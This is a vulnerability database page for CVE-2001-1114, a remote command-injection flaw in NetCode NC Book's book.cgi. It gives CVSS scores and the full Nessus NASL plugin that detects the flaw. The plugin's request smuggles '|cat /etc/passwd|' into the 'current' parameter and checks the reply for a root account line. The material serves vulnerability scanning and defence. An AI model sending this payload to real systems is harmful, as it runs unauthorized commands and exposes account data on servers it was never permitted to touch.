Vulnerabilities > CVE-2001-1114 - Unspecified vulnerability in Netcode NC Book 0.2B

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
netcode
nessus

Summary

book.cgi in NetCode NC Book 0.2b allows remote attackers to execute arbitrary commands via shell metacharacters in the "current" parameter.

Vulnerable Configurations

Part Description Count
Application
Netcode
1

Nessus

NASL familyCGI abuses
NASL idNCBOOK_CGI.NASL
descriptionThe CGI
last seen2020-06-01
modified2020-06-02
plugin id10721
published2001-08-13
reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10721
titleNetCode NC Book book.cgi current Parameter Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

if(description)
{
 script_id(10721);
 script_version ("1.26");
 script_cve_id("CVE-2001-1114");
 script_bugtraq_id(3178);

 script_name(english:"NetCode NC Book book.cgi current Parameter Arbitrary Command Execution");
 script_summary(english:"Checks for the presence of /cgi-bin/ncbook/book.cgi");

   script_set_attribute(
    attribute:'synopsis',
    value:'The remote service allows arbitrary command execution.'
  );

  script_set_attribute(
    attribute:'description',
    value:"The CGI 'book.cgi' is installed.  This CGI has a well
known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon."
  );

  script_set_attribute(
    attribute:'solution',
    value: "Remove the affected CGI script."
  );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2001/08/13");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/08/13");
 script_cvs_date("Date: 2018/06/13 18:56:28");
   script_set_attribute(attribute:"plugin_type", value:"remote");
   script_end_attributes();

 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

function check(dir)
{
  local_var r, w;

  w = http_send_recv3(method:"GET", item:string(dir, "/ncbook.cgi",
"?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10"),
		port:port);
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  r = strcat(w[0], w[1], '\r\n', w[2]);
if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))
  {
   security_hole(port);
   exit(0);
  }
}


check(dir:"/ncbook");
foreach dir (cgi_dirs())
{
check(dir:string(dir));
check(dir:string(dir, "/ncbook"));
}